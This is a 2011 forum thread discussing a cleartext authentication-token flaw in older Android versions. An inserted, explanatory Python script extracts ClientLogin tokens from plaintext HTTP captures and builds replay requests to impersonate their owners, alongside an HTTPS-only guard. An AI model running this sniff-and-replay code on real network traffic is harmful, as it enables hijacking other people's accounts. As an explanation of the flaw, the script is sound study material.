Most Androids are vulnerable to account theft

Discussion in 'User Submitted News' started by TehSkull, May 19, 2011.

Thread Status:
Not open for further replies.
May 19, 2011
  1. TehSkull
    OP

    Member TehSkull Living the life

    Joined:
    Nov 29, 2009
    Messages:
    2,700
    Location:
    Louisiana
    Country:
    United States
    Researchers at Germany’s University of Ulm have made some unsettling discoveries about the security of the Android platform. According to an article from The Register, the research group located a vulnerability that allows hackers to collect and use the digital tokens saved on a phone after a user inputs credentials for a password-protected service.

    The problem seems to be linked to an authentication protocol called ClientLogin, which is present in versions of Android 2.3.3 and earlier (aka most Android phones). After a user inputs credentials for services like Twitter, Facebook, or Google Calendar (to name a few), the programming interface retrieves an authentication token, which is sent in cleartext. “Because the authToken can be used for up to 14 days in any subsequent requests on the service, attackers can exploit them to gain unauthorized access to accounts,” claimed the article, quoting University of Ulm researchers.

    Google has released a patch to solve the ClientLogin protocol problem, but the patch only works for Android 2.3.4 and Android 3.0, meaning that about 99 percent of Android phones don’t have access to the updated code. “We wanted to know if it is really possible to launch an impersonation attack against Google services and started our own analysis,” the researchers in the university’s Institute of Media Informatics wrote. “The short answer is: Yes, it is possible, and it is quite easy to do so.” Google has yet to release an official statement on the situation.
    Source

    This is a serious problem. Almost every Android phone out there is on 2.3.3 or lower, which means almost every Android is susceptible to account theft. I can confirm this is true, because my Facebook account was hacked not even a week after buying my first Android. Possibly a coincidence, but I doubt it.
     
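The mechanism described in the post above, as an added example that is not part of the original thread, the Register article, or the Ulm researchers' work: a ClientLogin token travels in an `Authorization: GoogleLogin auth=<token>` request header (that header format is the real ClientLogin one), so any app that sends it over plain HTTP hands a sniffer on the same network a credential that can simply be copied into a new request. The sample "captured" flows, the token values, and the `safe_to_send`/`authorized_headers` client-side guard are all constructed for illustration; the guard is a hypothetical hardening, not Google's actual fix.

```python
"""Passive detection of ClientLogin tokens leaked over plaintext HTTP,
the replay that makes them dangerous, and a client-side guard.
Added example; sample traffic and token values are constructed."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Real ClientLogin header format: "Authorization: GoogleLogin auth=<token>".
_AUTH_HDR = re.compile(rb"^Authorization:[ \t]*GoogleLogin[ \t]+auth=([^\r\n]+)", re.M)
_REQ_LINE = re.compile(rb"^(GET|POST|PUT|DELETE)[ \t]+(\S+)[ \t]+HTTP/1\.[01]\r?\n")
_HOST_HDR = re.compile(rb"^Host:[ \t]*([^\r\n]+)", re.M)


@dataclass(frozen=True)
class Finding:
    host: str
    path: str
    token: str
    dst_port: int


def find_leaked_tokens(flows):
    """flows: iterable of (dst_port, raw_http_request_bytes), i.e. TCP payloads
    reassembled from a capture. Only plaintext HTTP (port 80) is readable to a
    sniffer; a ClientLogin header in such a flow is a reusable credential."""
    findings = []
    for dst_port, payload in flows:
        if dst_port != 80:
            continue  # TLS payload is opaque to a passive observer
        req = _REQ_LINE.match(payload)
        auth = _AUTH_HDR.search(payload)
        if not (req and auth):
            continue
        host = _HOST_HDR.search(payload)
        findings.append(Finding(
            host=host.group(1).decode().strip() if host else "",
            path=req.group(2).decode(),
            token=auth.group(1).decode().strip(),
            dst_port=dst_port,
        ))
    return findings


def build_replay(finding, path=None):
    """The attacker's request: the sniffed token is copied verbatim into the
    same header. No password, no device access, and the token stays valid
    for up to 14 days according to the researchers quoted above."""
    path = path or finding.path
    return (f"GET {path} HTTP/1.1\r\nHost: {finding.host}\r\n"
            f"Authorization: GoogleLogin auth={finding.token}\r\n\r\n").encode()


def safe_to_send(url):
    """A bearer token should only ever ride inside TLS."""
    return urlsplit(url).scheme == "https"


def authorized_headers(url, token):
    """Hypothetical client-side hardening (not Google's patch): attach the token
    only when the transport is HTTPS, so a sniffer never sees it."""
    if not safe_to_send(url):
        raise ValueError(f"refusing to send ClientLogin token over {url}")
    return {"Authorization": f"GoogleLogin auth={token}"}


# Constructed sample flows standing in for what a sniffer on an open Wi-Fi
# network would reassemble. Token values are made up.
SAMPLE_FLOWS = [
    (80, b"GET /calendar/feeds/default/private/full HTTP/1.1\r\n"
         b"Host: www.google.com\r\n"
         b"Authorization: GoogleLogin auth=DQAAAMadeUpTokenForIllustration\r\n"
         b"User-Agent: Android-GData/1.0\r\n\r\n"),
    (443, b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"),  # TLS ClientHello, opaque
    (80, b"GET /feeds/contacts/default/full HTTP/1.1\r\n"
         b"Host: www.google.com\r\n"
         b"Authorization: GoogleLogin auth=DQAAAAnotherConstructedToken\r\n\r\n"),
    (80, b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"),  # no token
]

if __name__ == "__main__":
    for f in find_leaked_tokens(SAMPLE_FLOWS):
        print(f"leaked token for {f.host}{f.path}: {f.token}")
        print(build_replay(f).decode())
```

Run against a real capture you would feed `find_leaked_tokens` the reassembled client-to-server payloads from your packet tool; the point of the port-443 flow in the sample is that the same header inside TLS yields nothing, which is exactly why forcing HTTPS on the data endpoints closes the hole.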
  2. GreatZimkogway

    Member GreatZimkogway Touhou Fanatic

    Joined:
    Jul 21, 2009
    Messages:
    2,140
    Location:
    Imoriata
    Country:
    United States
    Everything is vulnerable. They'll patch it up and force all carriers to make an update ASAP.
     
  3. L551

    Member L551 GBAtemp Regular

    Joined:
    Mar 21, 2010
    Messages:
    109
    Country:
    United States
    Everything seems to have a vulnerability lately, doesn't it? o.O Well mainly Sony, but still.

    Hope they find a way to patch 2.3.3 and below for those users. (Most phones are still on 2.1/2.2) I don't want this to turn into a widespread thing... though I'm on 2.3.4.
     
  4. CarbonX13

    Member CarbonX13 GBAtemp 台灣人

    Joined:
    Aug 27, 2010
    Messages:
    1,399
    Location:
    Vancouver, B.C.
    Country:
    Taiwan
    Google's applying a 'stealth patch' to everyone's devices in the next few days. The patch will not require any carriers to officially push it out, nor you to actually perform the update. Google says you'll hardly notice them patching your phone.

    Source

    Edit: Also... http://gbatemp.net/t293263-more-than-99-of...ly-leaking-data
     
  5. TehSkull
    OP

    Member TehSkull Living the life

    Joined:
    Nov 29, 2009
    Messages:
    2,700
    Location:
    Louisiana
    Country:
    United States
    I guess I didn't look back enough pages. :/
    What the? How the? I looked through 3 pages, and didn't see it. :|
     
  6. RupeeClock

    Member RupeeClock Colors 3D Snivy!

    Joined:
    May 15, 2008
    Messages:
    6,307
    Country:
    United Kingdom
    I don't particularly see how this differs from vulnerabilities found in things like Windows OSs or Firefox, these sorts of problems are discovered all the time and promptly patched.

    I suppose the difference is that the vulnerability exists in a device that is always communicating with other devices and connections, leaving it much more open than other things.
     
  7. TehSkull
    OP

    Member TehSkull Living the life

    Joined:
    Nov 29, 2009
    Messages:
    2,700
    Location:
    Louisiana
    Country:
    United States
    That, and it's up to the OEM/carrier, not Google, as to when patches get rolled out. People who run CyanogenMod or the like are always on the latest version from Google, but those with stock ROMs have to wait on their carrier to okay the update.
     
  8. Rydian

    Member Rydian Resident Furvert™

    Joined:
    Feb 4, 2010
    Messages:
    27,883
    Location:
    Cave Entrance, Watching Cyan Write Letters
    Country:
    United States
    As stated, a repeat.
     